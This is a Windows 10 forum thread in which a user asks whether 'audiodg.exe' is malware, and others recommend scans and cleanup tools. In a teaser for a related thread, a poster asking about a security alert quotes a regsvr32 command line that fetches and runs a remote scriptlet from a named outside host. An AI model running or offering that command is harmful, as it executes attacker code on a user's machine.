Windows 10: I might have found malware called "audiodg.exe"

Discus and support I might have found malware called "audiodg.exe" in AntiVirus, Firewalls and System Security to solve the problem; Does anyone know about this executable (as malware) and how to get rid of it? Thank you! 74747 Discussion in 'AntiVirus, Firewalls and System Security' started by Nisko, Jan 12, 2017.

1. Nisko Win User

I might have found malware called "audiodg.exe"

Does anyone know about this executable (as malware) and how to get rid of it? Thank you!

:)

Nisko, Jan 12, 2017

2. error 0xc101009b (0xc00d4e85) in Windows 10

This did not fix the problem, there was no audiodg.exe in task manager?

Trentos123, Jan 12, 2017
  3. error 0xc101009b (0xc00d4e85) in Windows 10

But audiodg.exe don't show in task manager of my system, now what should I do....

ravi singh0907, Jan 12, 2017
  4. I might have found malware called "audiodg.exe"

It is possible that it is malware. This is also a valid Windows file.

To be sure head to malwarebytes.com and download malwarebytes. Run scan. If it finds something let it fix. Reboot and rerun scan. If it is back additional actions will be required.

Malwarebytes usually does a very good job at detecting and removing. What AV are you using that found it?

Caledon Ken, Jan 12, 2017
  5. Nisko Win User
    Running MBAM now. I found it when I received a message at boot that something was aready using my webcam (when nothing should have been using it). I Googled it and found it was a common malware. Now I need a way to get rid of it.

Nisko, Jan 12, 2017
  6. What AV are you using? Did you also do a full scan with it?

7. Caledon Ken, Jan 12, 2017
  8. Nisko Win User

I used Malwarebytes and AVG. Also Ccleaner. full scans with all.

Nisko, Jan 12, 2017
  9. Please follow that link, then to post 6. CCCleaner is not an antivirus anything, to my knowledge, maybe something has changed.. That post will lead you to different tools.

10. simrick Win User
    Hi.
    I would run, in this order:
    RKILL
    ADWCleaner (it will reboot)
    RKILL (again)
    JRT
    MBAM (custom scan with Rootkit box checked)
    **(all these are free or have free versions)**
    SFC /SCANNOW from an admin command prompt

Feel free to post the logs for eval.

p.s. Find out what's using your webcam

simrick, Apr 5, 2018
Thema:

1. I might have found malware called "audiodg.exe" - Similar Threads - might found malware

2. I am worried that my pc might have malware

in Windows 10 Gaming
    I am worried that my pc might have malware: Hi there I want to start this by saying that I am not a very tech savvy person.That being said it all started when I was browsing the internet trying to find information about some actor who passed awayI am romanian.As I was looking at some google images I accidentally...
  3. I am worried that my pc might have malware

in Windows 10 Software and Apps
    I am worried that my pc might have malware: Hi there I want to start this by saying that I am not a very tech savvy person.That being said it all started when I was browsing the internet trying to find information about some actor who passed awayI am romanian.As I was looking at some google images I accidentally...
  4. Someone called and claimed I have Malware

in AntiVirus, Firewalls and System Security
    Someone called and claimed I have Malware: "Got a call from someone saying they were from Amazon and wanting me to go to my google search and type "SIXME.TOOLS" I hung upon them but is this some type of new virus/malware?"[Original Title: Malware]...
  5. regsvr32.exe as Malware

in Windows 10 BSOD Crashes and Debugging
    regsvr32.exe as Malware: Hello Team, We are observing Malware as Cloud IOC: W32.COMScriptletAbuse.ioc from the file path C:\Windows\System32\regsvr32.exe /s /n /u /i:http://server2.aserdefa.ru/restore.xml scrobj.dll. Can we delete or Uninstall the file will it affect the OS. Please let me know...
  6. is Excelcnv exe malware?

is Excelcnv exe malware?: I have problems with my PC performance. Today I found a program file called excelcnv. I think it is malware but I am not sure. Can I delete this file? c:/programfiles(X86)/microsoftoffice/root/office16 Thank you....
  7. I Might be Infected with Malware

I Might be Infected with Malware: I had an experience recently where a page opened, and I was unable to close it. Anything I typed was hidden behind this page. Task Master did not close it. I ran the Microsoft Removal Tool but this came back saying nothing was wrong. I called a service I have for remote...
  8. Audiodg Issues

in Windows 10 BSOD Crashes and Debugging
    Audiodg Issues: Like many others, I've encountered the high CPU issue when audiodg (Windows Audio Device Graph Isolation) is running. By ending this process in the task manager, I can use my PC without issues. However, after a recent Windows update, I cannot end the task under "Processes"...
  9. Hi, I have problems with a malware programme called reimage.

Hi, I have problems with a malware programme called reimage.: I am doing everything I can te readicate. The problem I have is that I took me laptop to a PD repairer and he changed the admin password. He no longer is in business. I cannot do anything to mt laptop without this pass word. I really do not want to do a reset. Any advice...
  10. Might have caught some malware

in Browsers and Email
    Might have caught some malware: Hello. I use Windows 10 and Chrome.Ever since a few days ago I started getting pop up links to ads sites such as offers.alibaba.com etc,.For example:when I click on normal texts on a web page(or just a link),sometimes it(my desired webpage) opens on a new tab and the...
Tags: